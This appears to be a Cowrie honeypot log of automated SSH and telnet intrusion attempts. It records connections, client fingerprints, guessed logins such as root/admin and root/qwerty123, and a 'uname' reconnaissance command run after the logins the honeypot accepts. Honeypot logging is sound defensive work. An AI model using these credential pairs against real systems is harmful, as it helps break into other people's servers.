{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:30:47.731545Z","src_ip":"212.227.125.160","session":"692bf4ebe21c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:30:47.732261Z","src_ip":"212.227.125.160","session":"692bf4ebe21c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:47.837443Z","src_ip":"212.227.125.160","session":"692bf4ebe21c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:47.838472Z","src_ip":"212.227.125.160","session":"692bf4ebe21c"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.126.73","src_port":57156,"dst_ip":"1.2.3.4","dst_port":22,"session":"f554bd5f3de8","protocol":"ssh","message":"New connection: 14.103.126.73:57156 (1.2.3.4:22) [session: f554bd5f3de8]","sensor":"my-vps","timestamp":"2025-08-28T05:30:53.657876Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33042,"dst_ip":"1.2.3.4","dst_port":22,"session":"a313fcc68c35","protocol":"ssh","message":"New connection: 212.227.235.229:33042 (1.2.3.4:22) [session: a313fcc68c35]","sensor":"my-vps","timestamp":"2025-08-28T05:30:54.129762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:30:54.194054Z","src_ip":"212.227.235.229","session":"a313fcc68c35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:30:54.428502Z","src_ip":"212.227.235.229","session":"a313fcc68c35"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:30:54.934904Z","src_ip":"212.227.235.229","session":"a313fcc68c35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:30:55.310388Z","src_ip":"212.227.235.229","session":"a313fcc68c35"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:30:55.311084Z","src_ip":"212.227.235.229","session":"a313fcc68c35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:55.458062Z","src_ip":"212.227.235.229","session":"a313fcc68c35"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:30:55.459474Z","src_ip":"212.227.235.229","session":"a313fcc68c35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48726,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd0683696cd9","protocol":"ssh","message":"New connection: 212.227.125.160:48726 (1.2.3.4:22) [session: cd0683696cd9]","sensor":"my-vps","timestamp":"2025-08-28T05:31:01.999362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:31:02.000356Z","src_ip":"212.227.125.160","session":"cd0683696cd9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:31:02.105769Z","src_ip":"212.227.125.160","session":"cd0683696cd9"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:31:02.424374Z","src_ip":"212.227.125.160","session":"cd0683696cd9"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":58680,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb3581a7a203","protocol":"telnet","message":"New connection: 8.222.212.69:58680 (1.2.3.4:23) [session: bb3581a7a203]","sensor":"my-vps","timestamp":"2025-08-28T05:31:02.576189Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:03.531740Z","src_ip":"212.227.125.160","session":"cd0683696cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41750,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cda2f5f6ab1","protocol":"ssh","message":"New connection: 212.227.235.229:41750 (1.2.3.4:22) [session: 1cda2f5f6ab1]","sensor":"my-vps","timestamp":"2025-08-28T05:31:13.518247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:31:13.520666Z","src_ip":"212.227.235.229","session":"1cda2f5f6ab1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:31:13.695803Z","src_ip":"212.227.235.229","session":"1cda2f5f6ab1"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:31:14.265510Z","src_ip":"212.227.235.229","session":"1cda2f5f6ab1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:15.410837Z","src_ip":"212.227.235.229","session":"1cda2f5f6ab1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47696,"dst_ip":"1.2.3.4","dst_port":22,"session":"040f75b6d03f","protocol":"ssh","message":"New connection: 212.227.235.229:47696 (1.2.3.4:22) [session: 040f75b6d03f]","sensor":"my-vps","timestamp":"2025-08-28T05:31:20.835430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:31:20.836584Z","src_ip":"212.227.235.229","session":"040f75b6d03f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:31:20.980028Z","src_ip":"212.227.235.229","session":"040f75b6d03f"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:31:21.412241Z","src_ip":"212.227.235.229","session":"040f75b6d03f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:22.559974Z","src_ip":"212.227.235.229","session":"040f75b6d03f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46228,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed2a57f20a37","protocol":"ssh","message":"New connection: 212.227.125.160:46228 (1.2.3.4:22) [session: ed2a57f20a37]","sensor":"my-vps","timestamp":"2025-08-28T05:31:31.437449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:31:31.438267Z","src_ip":"212.227.125.160","session":"ed2a57f20a37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:31:31.543040Z","src_ip":"212.227.125.160","session":"ed2a57f20a37"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:31:31.855071Z","src_ip":"212.227.125.160","session":"ed2a57f20a37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:31:32.162989Z","src_ip":"212.227.125.160","session":"ed2a57f20a37"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:31:32.163746Z","src_ip":"212.227.125.160","session":"ed2a57f20a37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:32.268950Z","src_ip":"212.227.125.160","session":"ed2a57f20a37"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:32.270054Z","src_ip":"212.227.125.160","session":"ed2a57f20a37"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":59770,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfa8e43bc798","protocol":"telnet","message":"New connection: 8.222.212.69:59770 (1.2.3.4:23) [session: dfa8e43bc798]","sensor":"my-vps","timestamp":"2025-08-28T05:31:34.107516Z"}
{"eventid":"cowrie.session.closed","duration":32.42807221412659,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:35.003427Z","src_ip":"8.222.212.69","session":"bb3581a7a203"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41170,"dst_ip":"1.2.3.4","dst_port":22,"session":"83f5b5fa1f46","protocol":"ssh","message":"New connection: 212.227.235.229:41170 (1.2.3.4:22) [session: 83f5b5fa1f46]","sensor":"my-vps","timestamp":"2025-08-28T05:31:36.752994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:31:36.754120Z","src_ip":"212.227.235.229","session":"83f5b5fa1f46"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:31:36.898503Z","src_ip":"212.227.235.229","session":"83f5b5fa1f46"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:31:37.379848Z","src_ip":"212.227.235.229","session":"83f5b5fa1f46"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:31:37.687106Z","src_ip":"212.227.235.229","session":"83f5b5fa1f46"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:31:37.687840Z","src_ip":"212.227.235.229","session":"83f5b5fa1f46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:37.833388Z","src_ip":"212.227.235.229","session":"83f5b5fa1f46"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:37.834431Z","src_ip":"212.227.235.229","session":"83f5b5fa1f46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33078,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba30c639db61","protocol":"ssh","message":"New connection: 212.227.235.229:33078 (1.2.3.4:22) [session: ba30c639db61]","sensor":"my-vps","timestamp":"2025-08-28T05:31:50.709712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:31:50.710653Z","src_ip":"212.227.235.229","session":"ba30c639db61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:31:50.855424Z","src_ip":"212.227.235.229","session":"ba30c639db61"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:31:51.296923Z","src_ip":"212.227.235.229","session":"ba30c639db61"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:52.444470Z","src_ip":"212.227.235.229","session":"ba30c639db61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37944,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e9cae769d37","protocol":"ssh","message":"New connection: 212.227.125.160:37944 (1.2.3.4:22) [session: 5e9cae769d37]","sensor":"my-vps","timestamp":"2025-08-28T05:31:58.528683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:31:58.579204Z","src_ip":"212.227.125.160","session":"5e9cae769d37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:31:58.667348Z","src_ip":"212.227.125.160","session":"5e9cae769d37"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:31:59.053897Z","src_ip":"212.227.125.160","session":"5e9cae769d37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:31:59.356363Z","src_ip":"212.227.125.160","session":"5e9cae769d37"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:31:59.357135Z","src_ip":"212.227.125.160","session":"5e9cae769d37"}
